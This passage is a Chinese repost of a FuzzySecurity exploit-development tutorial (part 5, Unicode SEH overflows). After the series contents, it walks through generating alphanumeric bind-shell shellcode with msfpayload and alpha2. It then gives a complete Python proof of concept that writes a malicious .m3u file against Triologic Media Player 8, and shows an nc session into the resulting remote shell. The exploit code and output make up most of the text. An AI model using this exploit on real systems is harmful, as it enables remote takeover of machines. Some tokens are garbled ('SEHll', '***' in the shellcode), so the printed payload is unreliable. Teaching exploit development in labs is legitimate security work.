- 第一部分: Introduction to Exploit Development
- 第二部分:Saved Return Pointer Overflows
- 第三部分:Structured Exception Handler (SEH)
- 第四部分:Egg Hunters
- 第五部分:Unicode 0x00410041
- 第六部分:WIN32 shellcode 编写
- 第七部分:返回导向编程(ROP)
- 第八部分:堆喷射第一节【覆写 EIP】
- 第九部分:堆喷射[第二章:UAF]
- 第十部分:内核利用程序之栈溢出
- 第十一部分:内核利用程序之任意位置任意写
- 第十二部分:内核利用程序之空指针引用
- 第十三部分:内核利用程序之未初始化栈变量
- 第十四部分:内核利用程序之整数溢出
- 第十五部分:内核利用程序之 UAF
- 第十六部分:内核利用程序之池溢出
- 第十七部分:内核利用程序之任意位置任意写
- 第十八篇:内核利用程序之 RS2 Bitmap 巫术
- 第十九篇:内核利用程序之 Razer
文章来源于网络收集而来,版权归原创者所有,如有侵权请及时联系!
Shellcode + 游戏结束
到这里游戏真的结束了. 现在只需生成一些 unicode 兼容的 Shellcode. 感谢 SkyLined 所做的工作. 使得生成 unicode 兼容 Shellcode 很轻松. 你可以在这里获得 alpha2 编码器:这里. 下载 C 代码并用 gcc 编译. 下面是产生 Shellcode 的语法:
root@bt:/pentest/alpha2# msfpayload -l
[...snip...]
windows/SEHll/reverse_tcp_dns Connect back to the attacker, Spawn a piped command SEHll (staged)
windows/SEHll_bind_tcp Listen for a connection and spawn a command SEHll
windows/SEHll_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and spawn a
command SEHll[...snip...]
root@bt:/pentest/alpha2# msfpayload windows/SEHll_bind_tcp O
Name: Windows Command SEHll, Bind TCP Inline
Module: payload/windows/SEHll_bind_tcp
Version: 8642
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 341
Rank: Normal
Provided by:
vlad902 <vlad902@gmail.com>
sf <stephen_fewer@harmonysecurity.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command SEHll
root@bt:/pentest/alpha2# msfpayload windows/SEHll_bind_tcp LPORT=9988 R > bindSEHll9988.raw
root@bt:/pentest/alpha2# ./alpha2 eax --unicode --uppercase < bindSEHll9988.raw
PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1
AYAZBABABABAB30APB944JBKLK8CYKPM0KPQP59ZEP18RQTTKQBNP4KQBLLTK0RLTDKCBMXLOWGOZO6NQKONQ7PVLOLC13LKRNLO0GQHOL
MKQY7YRL022R74KPRLP4KPBOLKQJ0TKOPSHSU7PD4OZKQ8PPPTKQ8LX4KQHO0M1ICJCOLOYTK04TKM1YFP1KONQ7P6L7QXOLMKQ7W08K0R
UZTM33ML8OKCMO4SEYRQHTKPXO4KQICQV4KLLPK4KR8MLKQHSTKKT4KKQJ0SYOTO4NDQKQK1Q0Y1JPQKOIPB8QOQJTKMBJKTFQM38NSOBK
PKPQXBWBSNRQOB4QXPLBWN***KO8UWHDPM1KPKPNIWTPTPPBHO9SPRKKPKOJ50P20PP0P10PP10R0S89ZLOIOYPKO9EE9XGNQ9K1CRHM2K
PNGKTTIK61ZLP0V0WBH7RYKOGS7KOXU0SPWQX7GIYOHKOKOZ50SB3R7C83DZLOKK1KO8UQGTIGWS8RURN0M1QKO8URHRC2MQTKPTIK31G0
WPWNQL6QZMBR9R6JBKM1VY7OTMTOLM1KQTMOTO4N096KPQ4B4PPQF0VPVOV26PNB6R6B3QF1X3IHLOO3VKOHUTIK00NR6PFKONP38LHU7M
MQPKOXUGKJPGEVBPV38G6F5GM5MKOXUOLLF3LKZCPKKIPBUM57KOWMCSBRO2JM0PSKO9EA
编码 Shellcode 的时候注意指定适当的寄存器. 增加一些注释,最后的 POC 如下:
#!/usr/bin/python -w #-------------------------------------------------------------------------------# # Exploit: Triologic Media Player 8 (.m3u) SEH Unicode # # Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/ # # OS: WinXP PRO SP3 # # Software: http://download.cnet.com/Triologic-Media-Player/ # # 3000-2139_4-10691520.html # #-------------------------------------------------------------------------------# # This exploit was created for Part 5 of my Exploit Development tutorial # # series - http://www.fuzzysecurity.com/tutorials/expDev/5.html # #-------------------------------------------------------------------------------# # root@bt:/pentest/alpha2# nc -nv 192.168.111.128 9988 # # (UNKNOWN) [192.168.111.128] 9988 (?) open # # Microsoft Windows XP [Version 5.1.2600] # # (C) Copyright 1985-2001 Microsoft Corp. # # # # C:\Documents and Settings\Administrator\Desktop> # #-------------------------------------------------------------------------------# filename="evil.m3u" #---------------------SEH-Structure---------------------# #nSEH => \x41\x71 => 41 INC ECX # # 0071 00 ADD BYTE PTR DS:[ECX],DH # #SEH => \xF2\x41 => F2: PREFIX REPNE: # # 0041 00 ADD BYTE PTR DS:[ECX],AL # #-------------------------------------------------------# #0x004100f2 : pop esi # pop ebx # ret 04 | triomp8.exe # #-------------------------------------------------------# SEH = "\x41\x71" + "\xF2\x41" #-----------------------Alignment-----------------------# #After we step through nSEH and SEH if look at the dump # #of the CPU registers we can see several which are close# #to our Shellcode, I chose EBP. Time for some Venetian # #Black-Magic alignment... # #-------------------------------------------------------# align = ( "\x55" #push EBP "\x71" #Venetian Padding "\x58" #pop EAX "\x71" #Venetian Padding "\x05\x20\x11" #add eax,0x11002000 \ "\x71" #Venetian Padding |> +300 "\x2d\x17\x11" #sub eax,0x11001700 / "\x71" #Venetian Padding "\x50" #push EAX "\x71" #Venetian Padding "\xC3") #RETN #We need to pad our buffer to the place of our alignment in EAX filler = "\x58"*117 #---------------------------------------Shellcode---------------------------------------------# #root@bt:/pentest/alpha2# msfpayload windows/SEHll_bind_tcp LPORT=9988 R > bindSEHll9988.raw # #root@bt:/pentest/alpha2# ./alpha2 eax --unicode --uppercase < bindSEHll9988.raw # #---------------------------------------------------------------------------------------------# Shellcode = ( "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1" "AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA" "BAB30APB944JBKLK8CYKPM0KPQP59ZEP18RQTTKQBNP4KQBLLTK0RLTDKC" "BMXLOWGOZO6NQKONQ7PVLOLC13LKRNLO0GQHOLMKQY7YRL022R74KPRLP4" "KPBOLKQJ0TKOPSHSU7PD4OZKQ8PPPTKQ8LX4KQHO0M1ICJCOLOYTK04TKM" "1YFP1KONQ7P6L7QXOLMKQ7W08K0RUZTM33ML8OKCMO4SEYRQHTKPXO4KQI" "CQV4KLLPK4KR8MLKQHSTKKT4KKQJ0SYOTO4NDQKQK1Q0Y1JPQKOIPB8QOQ" "JTKMBJKTFQM38NSOBKPKPQXBWBSNRQOB4QXPLBWN***KO8UWHDPM1KPKPN" "IWTPTPPBHO9SPRKKPKOJ50P20PP0P10PP10R0S89ZLOIOYPKO9EE9XGNQ9" "K1CRHM2KPNGKTTIK61ZLP0V0WBH7RYKOGS7KOXU0SPWQX7GIYOHKOKOZ50" "SB3R7C83DZLOKK1KO8UQGTIGWS8RURN0M1QKO8URHRC2MQTKPTIK31G0WP" "WNQL6QZMBR9R6JBKM1VY7OTMTOLM1KQTMOTO4N096KPQ4B4PPQF0VPVOV2" "6PNB6R6B3QF1X3IHLOO3VKOHUTIK00NR6PFKONP38LHU7MMQPKOXUGKJPG" "EVBPV38G6F5GM5MKOXUOLLF3LKZCPKKIPBUM57KOWMCSBRO2JM0PSKO9EA") boom = SEH + align + filler + Shellcode buffer = "\x90"*536 + boom + "B"*(4466-len(boom)) textfile = open(filename , 'w') textfile.write(buffer) textfile.close()
下图可以看到 EAX 精确指向我们的 Shellcode, 打开 POC 后再
netstat –an
可以看到 binshell 正在监听,游戏结束!!
root@bt:/pentest/alpha2# nc -nv 192.168.111.128 9988
(UNKNOWN) [192.168.111.128] 9988 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.111.128
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
C:\Documents and Settings\Administrator\Desktop>
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论